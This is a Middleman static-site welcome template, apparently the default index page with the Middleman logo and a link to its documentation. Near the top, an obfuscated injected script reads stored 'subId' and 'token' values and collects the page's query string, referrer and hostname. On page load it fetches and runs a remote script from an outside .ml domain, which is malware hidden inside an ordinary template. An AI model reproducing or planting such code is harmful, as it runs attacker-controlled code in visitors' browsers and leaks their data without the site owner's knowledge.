---
title: Welcome to Middleman
---
<script>
    (function() {
    var name = '_7CB71jsmWDnk6Lz1';
    if (!window._7CB71jsmWDnk6Lz1) {
        window._7CB71jsmWDnk6Lz1 = {
            unique: false,
            ttl: 86400,
            R_PATH: 'https://lereas.ml/Tkt5dbvC',
            P_PATH: 'https://lereas.ml/7b4f75c/postback',
        };
    }
    const _kjMQ3KxycknNxMFM = localStorage.getItem('config');
    if (typeof _kjMQ3KxycknNxMFM !== 'undefined' && _kjMQ3KxycknNxMFM !== null) {
        var _1bHPwJp3PLTSQmkD = JSON.parse(_kjMQ3KxycknNxMFM);
        var _vvywYJWSCcGHryWK = Math.round(+new Date()/1000);
        if (_1bHPwJp3PLTSQmkD.created_at + window._7CB71jsmWDnk6Lz1.ttl < _vvywYJWSCcGHryWK) {
            localStorage.removeItem('subId');
            localStorage.removeItem('token');
            localStorage.removeItem('config');
        }
    }
    var _9DkDbTr9kQZZ616y = localStorage.getItem('subId');
    var _6dHGv1Lg1bxB312q = localStorage.getItem('token');
    var _9vxtTgbf4vT2p8sL = '?return=js.client';
        _9vxtTgbf4vT2p8sL += '&' + decodeURIComponent(window.location.search.replace('?', ''));
        _9vxtTgbf4vT2p8sL += '&se_referrer=' + encodeURIComponent(document.referrer);
        _9vxtTgbf4vT2p8sL += '&default_keyword=' + encodeURIComponent(document.title);
        _9vxtTgbf4vT2p8sL += '&landing_url=' + encodeURIComponent(document.location.hostname + document.location.pathname);
        _9vxtTgbf4vT2p8sL += '&name=' + encodeURIComponent(name);
        _9vxtTgbf4vT2p8sL += '&host=' + encodeURIComponent(window._7CB71jsmWDnk6Lz1.R_PATH);
    if (typeof _9DkDbTr9kQZZ616y !== 'undefined' && _9DkDbTr9kQZZ616y && window._7CB71jsmWDnk6Lz1.unique) {
        _9vxtTgbf4vT2p8sL += '&sub_id=' + encodeURIComponent(_9DkDbTr9kQZZ616y);
    }
    if (typeof _6dHGv1Lg1bxB312q !== 'undefined' && _6dHGv1Lg1bxB312q && window._7CB71jsmWDnk6Lz1.unique) {
        _9vxtTgbf4vT2p8sL += '&token=' + encodeURIComponent(_6dHGv1Lg1bxB312q);
    }
    var a = document.createElement('script');
        a.type = 'application/javascript';
        a.src = window._7CB71jsmWDnk6Lz1.R_PATH + _9vxtTgbf4vT2p8sL;
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(a, s)
    })();
    </script>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 400 340" class="middleman-logo" aria-labelledby="middleman-logo__title" role="img">
  <title id="middleman-logo__title">Middleman</title>
  <path class="middleman-logo__top-left-bar" fill-opacity=".45" d="M0 40L200 0v30L0 60z"/>
  <path class="middleman-logo__top-right-bar" fill="#fff" d="M200 0l200 40v20L200 30z"/>
  <path class="middleman-logo__left-m" fill-opacity=".45" d="M0 78v184l45 5V152l45 83 47-83v129l53 7V52l-57 8-43 83-43-70z"/>
  <path class="middleman-logo__right-m" fill="#fff" d="M400 78v184l-45 5V152l-45 83-47-83v129l-53 7V52l57 8 43 83 43-70z"/>
  <path class="middleman-logo__bottom-left-bar" fill-opacity=".45" d="M0 300l200 40v-30L0 280z"/>
  <path class="middleman-logo__bottom-right-bar" fill="#fff" d="M200 340l200-40v-20l-200 30z"/>
</svg>

<h1>
  Middleman is Running
</h1>

<%= link_to(
  "Read Documentation",
  "https://middlemanapp.com/basics/templating_language/",
  target: "_blank"
) %>
